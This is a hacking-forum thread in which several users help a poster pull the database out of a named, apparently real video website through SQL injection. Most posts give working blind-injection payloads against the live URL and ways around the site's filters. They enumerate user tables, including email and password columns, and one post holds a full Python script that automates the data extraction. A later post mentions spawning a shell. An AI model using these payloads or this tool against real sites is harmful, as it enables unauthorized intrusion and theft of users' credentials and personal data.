
Need Help In SQL Injection.

Darkforce
Rank: CD-диск (User)
Registered: 12.04.2020
Messages: 12
Reactions: 1
Dear Friends,

I found a SQL injection in a website, but I can't fetch the database, either via sqlmap or manually.

Here is the detail:

Link: https://xdporner.com/videos.php?c=1

Please help me with this. If you reach the database, please put all the steps in a txt file.

Sorry for my poor English.

Thanks in advance.
 
Hello, I'm at work so I can't help much right now, but I did some quick tests in my phone's browser and 1=1 / 1=2 works well. You could start from that to blind-exfiltrate data.

Code:
https://xdporner.com/videos.php?c=1 AND 1=1

With the boolean-based logic in my example, the first video resolves to one named "Man first" every time; you can mass-refresh and you'll keep getting this result.
And if you do 1=2 you get a random video each time.

Btw, I'll test more later, because it's weird that sqlmap doesn't succeed.

I found out that you can evaluate functions by doing this (an order higher than 1 gives an error, a bit strange):
Code:
https://xdporner.com/videos.php?c=1 and 0=1 union all select db_name()
will return:
[screenshot]

and
Code:
view-source:https://xdporner.com/videos.php?c=1 and 0=1 union all select SLEEP()
makes the page never respond. Even if you sleep(5) it will never respond. I had this issue once on a Redmine SQL injection: you just need to try/catch the timeout status and set the timeout to 3 seconds in your script to evaluate a false or true output.
 
I have been trying some things and it looks like single quotes and double quotes are HTML-encoded.
Still, I think I could get around that, but I notice that substring is also escaped? Because when I e.g.
try substring(database(),1,1) I get a SQL error. But things like this work:
and concat(char(0x78)) = concat(char(0x78)), so wtf. Also the user has privileges on the information_schema
database, which is also handy. So if somebody knows an alternative for substring, let us know ^^
 
[quote of the reply above omitted]
Thanks for the good explanation ☺
 
[quote of the reply above omitted]
Does that mean it's not possible to fetch the database?
 
[quote of the post above about substring omitted]
I've got an explanation for this, I think. Look:
[screenshot]

(don't judge my shitty hackbar extension xD, I'm at work and can't install Burp)

As you can see, I was testing some blind query syntax and figured out that when you input a "," it splits the query: the FROM info..... part disappeared.
I think the query is built by code that splits parts of the query on ",".

If you try the same syntax without "," (which is dumb because substring takes more than one arg, but we do it for testing purposes) then:
[screenshot]

The query didn't get split.
 
Update comrades, I got a query working:
Code:
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 0x257573657225 limit 1,1) = 1
This is a valid query to check whether a table with a name like '%user%' exists.
If it is = 1, the first video loaded is "Man first"; if = 0, the first video is always random. Same behaviour as with the classic 1=1 and 1=2 in my first answer.
I have noted the following behaviours:

- single and double quotes are not usable because they are HTML-encoded.
- backquotes ` surrounding a string make the database treat the string as a column name, so they can't be used to build strings.
- the 0x0000000 hex string format works without quotes, so we are happy; it also works in LIKE operators: you can turn foo LIKE %user% into foo LIKE 0x75736572.
- "," seems to split the query. It can be useful if the context is nicely understood, but for now let's avoid functions that need multiple parameters (NOTE: in LIMIT it doesn't split, wtf).
- WHERE tablename = 0x757365, for example, doesn't work (wtf); use LIKE instead of equals. For example, and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x75736572) = 1 will return true, and there are no wildcards, but replace the LIKE by = and it returns false. (I have checked with the logic below that there is a user table in xddb, so it's not a false positive.)

Partial query from my notes:
db name: xddb
[... ? ...] AND `idVideo` IN (SELECT `idVideo` FROM `VideoCategory` WHERE `idCategory` [... ? ...] AND (`txtName` LIKE '%%' OR `id [... ? ...]

The pattern at the beginning of my post can be used to exfiltrate data. You need to write a simple Python script to automate it, but I'll give you some request examples:
Code:
1 table LIKE user in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x75736572) = 1

2 tables LIKE user____ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f) = 2

1 table LIKE user_____ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f) = 1

3 table LIKE user________ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f5f5f5f) = 3

1 table LIKE user____________ in database xddb
https://xdporner.com/videos.php
?c=1 and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = 0x78646462 AND table_name LIKE 0x757365725f5f5f5f5f5f5f5f5f5f5f5f) = 1
All of these return boolean true, so you can automate the exfiltration of the user tables like this. I'm pretty sure you could even write a sqlmap tamper.py script to help it inject, but I'm not sure; I don't usually use tamper scripts, I write my own scripts when I find a website sqlmap doesn't like.
 
[quote of the "Update comrades" post above omitted]
Oh wow, nice work man. I also tried a char attack, but with the following technique:
https://xdporner.com/videos.php?c=1 and (select count(*) from information_schema.schemata where schema_name like CONCAT(CHAR(0x27),CHAR(0x25),CHAR(0x69),CHAR(0x25),CHAR(0x27))) > 0

But I didn't know you could write it like: 0x257573657225

I will definitely try to incorporate this knowledge into the script I've made (already found some stuff to fix in this example)
so that I can automatically char-attack and get the data back (in examples like this; I do not condone attacking real targets).
Normally I use substring to chop up the string into single characters and do a check loop. I was already thinking of converting it
to ASCII so I only have to check 0-9 and get a more detailed response.

I personally noticed you can distinguish the "good" and "bad" reply with the following data:
good response contains: "<span class="subheading">in 1080p </span>"
bad response contains: "Unfortunately, there is no results in 1080p".

Nice find ^^
 
[quote of the reply above omitted]
The reason substring doesn't work is the "," splitting the query programmatically in the backend. I had the same issue trying to use convert(varchar(max),binary(max),column_foo) to get the full hex of a column and do some arithmetic to optimize the number of requests for data exfiltration. Didn't work :/

I'm happy that it can help you improve your work, which I saw, and nice work by the way. If you are interested in web app vulnerabilities, especially SQLi, feel free to DM me; we could exchange sometimes :)
 
[quote of the reply above omitted]
Thanks! And yeah, cool, same for you; if you have any questions you can always contact me on my Telegram (see profile) ^^
 
[quote of the reply above omitted]

UPDATE:
So today I spent multiple hours trying to figure this one out, but I think I found something useful.

I started by making a script that would check every character from left to right without substring, because, as you found out, a comma destroys the query.
I wanted to do this with the single left-percent technique in a LIKE query. So e.g. [select 1 where 'test' like '%te'] should give no result because the left part of
'lol test' doesn't begin with 'te'. But somehow that doesn't work with your technique where (in this example) you would do 0x257465 (so a single percent).

In the script it looks like this:
Code:
$dq_1 = " AND (SELECT 1 FROM information_schema.tables WHERE lower( (SELECT concat(table_name) from information_schema.tables where table_schema like 0x257864646225 limit 1) ) LIKE 0x25" . bin2hex($single_string_row) . bin2hex($single_char) . "25 limit 1,1) = 1";
$full_query = $target_url . $dq_1; // then sent with curl
But now I found out that it actually can work with a double percentage; there is only one weird rule:
- you need to guess a unique part of a given output that starts at the beginning of said output.

So let's say you have a string 'thumb 123 test' that you would like to get out. If you start with '%t%'
then OK, nice, you get a result back. Then you continue with the next letter (from a-z), and the next
"good" output would be '%te%', skipping 'thumb 123'.

So in relation to the site: if you do a query on the database name and start it with the given input x, then you get the full name back; otherwise it will only output 'b'.
Currently I did a query on the column_names of the correct db with the starting value 'us' and got out (not the full output):
usideo,boollike,datecreation,iduser,txtname,txtemail,txtdescription,datecreation,txtpassword,txtsalt,txtprofilepicture,txtcoverpicture,idrole,iduseractivity,txtip
And then you can add the output to the start, and the result becomes more correct the more characters you have; you just don't know where it starts retrieving data xD

Btw: limit 1,1 doesn't work, but limit 1 offset 1 could work ^^
 
[quote of the UPDATE post above omitted]
Quoting: "[select 1 where 'test' like '%te'] should give no result because the left part of 'lol test' doesn't begin with 'te'."
This is incorrect, I think you got it backwards: the % wildcard means anything of any length, so if my string is "efiujfueiufneTEST" and I do SELECT string FROM foo WHERE string LIKE '%TEST' it will find something, BUT if I search SELECT string FROM foo WHERE string LIKE 'TEST%' it will return nothing.
If you search for %user%, the string 'user' will match because "any length" includes length 0. To test that there are no chars before the keyword, use "_", which means any single char. For example, the string "AAAtest" will match LIKE '___test', '%___test' and '%test', but will not match '_test' or '__________test'.
Talking about wildcards: if you want to use the char '%' or '_' or others that are listed in the LIKE documentation, use an escape sequence such as [_].
Code:
....,"y","z","[_]","[-]",".","0","1",.....

By the way, limit 1,1 works fine for me; my whole script logic wouldn't work without it. I use it to select the index and it's extracting data, so it seems to work.

I don't have much time to test things and optimize my script, but you should try comparing the two hex strings obtained with the HEX() method on the table name and the guess, to see if we can make a comparison logic better than brute-forcing characters alphabetically.
 
Quoting: "[select 1 where 'test' like '%te'] should give no result because the left part of ..."
Ah yeah, stupid me, you're right, I got it switched around haha xD. Man, that is really dumb. That's what you get, I guess, for doing this at night haha.
Thanks for pointing this out to me! So a single quote DOES work here, looking at this example:
[site]?c=1 and (SELECT 1 FROM information_schema.tables WHERE database() LIKE 0x7825 limit 1) = 1
Also nice about that "_", didn't know about that one ^^ but for this script you can just use a single "%" wildcard to make it work.
And yeah, because I did the wildcard wrong I also thought the hex LIKE query didn't work haha, because this works now:
[site]?c=1 and (SELECT 1 FROM information_schema.tables WHERE hex(database()) LIKE 0x373825 limit 1) = 1
So yeah, hex is better because then you get 100% correct input (I already have a couple of scripts like that).
I also thought you could make a chart of which characters are used more (and less), see which hex characters they correspond to,
and sort a char array on that. That can be a little faster. But as this is error-based injection, I would think this is the only way?

Also, yes, limit 1,1 works, but I still have the feeling the ,1 doesn't do anything; it just doesn't throw a SQL error. But still, if you want to use
offset then you can just type offset I guess, so it's not separated by the ",".

Thanks for the info!
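To make the mechanics concrete, here is an added Python example; it is not any poster's script and not code from the site. It automates the two oracles the thread settled on: the COUNT(...) LIKE 0x.. check from the "Update comrades" post, and the hex(...) LIKE 0x..25 prefix walk from the post directly above, which extracts a value nibble by nibble without quotes, commas or SUBSTRING. The "good"/"bad" response markers are the ones quoted earlier in the thread. Everything else is an assumption for the demo: the target is a constructed SQLite stand-in for videos.php that HTML-encodes quotes, drops everything after the first comma and returns a "Man first" page for a true condition; the table `user` with columns txtname/txtpassword and its rows are invented, and `user` is also used as the FROM source where the thread used information_schema.tables (the table is a parameter).

```python
"""Boolean-based blind SQLi client for the constraints seen in this thread.

Strings travel as MySQL 0x.. literals (no quote characters); only one-argument
functions are used (no commas); data comes back via HEX(value) LIKE 'prefix%'.
The target is a constructed SQLite stand-in, not the site from the thread.
"""
import re
import sqlite3
from typing import Callable

# Response markers one poster reported for the true/false pages (quoted from the thread).
GOOD_MARKER = '<span class="subheading">in 1080p </span>'
BAD_MARKER = "Unfortunately, there is no results in 1080p"
HEX_DIGITS = "0123456789ABCDEF"

Oracle = Callable[[str], bool]  # takes the text appended to "c=1", returns the condition's truth


def hex_literal(s: str) -> str:
    """MySQL 0x.. string literal: carries arbitrary text with no quote in the request."""
    return "0x" + s.encode("utf-8").hex()


def classify(html: str) -> bool:
    """Map a response body to the boolean the injected condition evaluated to."""
    if GOOD_MARKER in html:
        return True
    if BAD_MARKER in html:
        return False
    raise ValueError("neither marker present: SQL error or unreliable oracle")


def count_payload(table: str, column: str, pattern: str, n: int) -> str:
    """'COUNT(column) LIKE pattern = n', the shape used for table enumeration in the thread."""
    return (f" and (SELECT COUNT({column}) FROM {table} "
            f"WHERE {column} LIKE {hex_literal(pattern)}) = {n}")


def prefix_payload(expr: str, hex_prefix: str, table: str) -> str:
    """True iff HEX(expr) starts with hex_prefix. HEX() takes one argument, so no comma is needed."""
    return (f" and (SELECT 1 FROM {table} WHERE HEX({expr}) "
            f"LIKE {hex_literal(hex_prefix + '%')} LIMIT 1) = 1")


def count_like(oracle: Oracle, table: str, column: str, pattern: str, limit: int = 64) -> int:
    """Find how many rows match the pattern by asking 'count = n' for n = 0..limit."""
    for n in range(limit + 1):
        if oracle(count_payload(table, column, pattern, n)):
            return n
    raise RuntimeError("count exceeds limit")


def extract_hex(oracle: Oracle, expr: str, table: str, max_nibbles: int = 1024) -> str:
    """Grow the known hex prefix one nibble at a time; stop when no digit extends it.
    HEX() output is only 0-9A-F, so no LIKE wildcard in the data can ever need escaping."""
    prefix = ""
    while len(prefix) < max_nibbles:
        for d in HEX_DIGITS:
            if oracle(prefix_payload(expr, prefix + d, table)):
                prefix += d
                break
        else:
            return prefix  # no digit matched: the value is complete (empty for NULL/'')
    raise RuntimeError("value longer than max_nibbles")


def extract_string(oracle: Oracle, expr: str, table: str) -> str:
    return bytes.fromhex(extract_hex(oracle, expr, table)).decode("utf-8", "replace")


class SimulatedTarget:
    """Offline stand-in for videos.php (assumption: SQLite with constructed rows). It mimics
    the behaviours observed in the thread: quotes HTML-encoded, query cut at the first comma,
    a 'Man first' page when the condition holds and a no-results page otherwise."""
    _HEX_LIT = re.compile(r"0x([0-9A-Fa-f]+)")

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE user (iduser INTEGER, txtname TEXT, txtpassword TEXT);
            INSERT INTO user VALUES (1, 'admin', 'Tr0ub4dor&3'), (2, 'user_x', 'p%q');
            CREATE TABLE videos (idvideo INTEGER, idcategory INTEGER, txtname TEXT);
            INSERT INTO videos VALUES (1, 1, 'Man first');
        """)

    def request(self, c: str) -> str:
        c = c.replace("'", "&#39;").replace('"', "&quot;")  # htmlspecialchars-style encoding
        c = c.split(",")[0]                                 # the comma truncation seen in the thread
        try:
            # MySQL reads 0x6162 as the string 'ab' in string context; spell it that way for SQLite.
            c = self._HEX_LIT.sub(
                lambda m: "'" + bytes.fromhex(m.group(1)).decode("utf-8").replace("'", "''") + "'", c)
            row = self.db.execute(
                f"SELECT txtname FROM videos WHERE idcategory = {c} ORDER BY idvideo LIMIT 1"
            ).fetchone()
        except (sqlite3.Error, ValueError) as e:
            return f"<html>SQL error: {e}</html>"
        return (f"<html><h1>{row[0]}</h1>{GOOD_MARKER}</html>" if row
                else f"<html>{BAD_MARKER}</html>")


def make_oracle(target: SimulatedTarget) -> Oracle:
    return lambda payload: classify(target.request("1" + payload))


if __name__ == "__main__":
    oracle = make_oracle(SimulatedTarget())
    print(count_like(oracle, "user", "txtname", "%user%"))
    print(extract_string(oracle, "(SELECT txtname FROM user LIMIT 1)", "user"))
    print(extract_string(oracle, "(SELECT txtpassword FROM user LIMIT 1 OFFSET 1)", "user"))
```

Each nibble costs at most 16 requests and the walk stops by itself when no digit extends the prefix, so there is no need for a LENGTH() probe. Rows are selected with LIMIT 1 OFFSET n, which keeps the comma out of the payload, and because HEX() only ever emits 0-9A-F the LIKE pattern never has to escape a '%' or '_' that happens to be in the data.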
 
[quote of the reply above omitted]
No worries, the hardest mistakes to resolve are usually the most obvious ^^
 
Looks like a straightforward SQLi...
You can just use sqlmap to dump the database or try to spawn a shell...
He said: "I found SQL injection in one website but I can't fetch the database via sqlmap and manually also."
So let's assume sqlmap fails. I've already seen some injections of this format, so I'm used to configuring sqlmap for them: I configured sqlmap with prefix and suffix arguments and tampered the strings into hex via Python scripts, but sqlmap still fails. It could be related to the fact that some data begins with blanks.

By the way, the format of the injection and the research described in the posts let you guess that stacked queries are not an option here, so the SQLi cannot be used to drop a shell.
 
[quote of the "straightforward SQLi" post above omitted]

Maybe he would like to understand how SQLi works before using a ready-made tool? Yes, sqlmap is useful and a good tool, but understanding how things work is very important. Wasn't it curiosity that brought us here?
 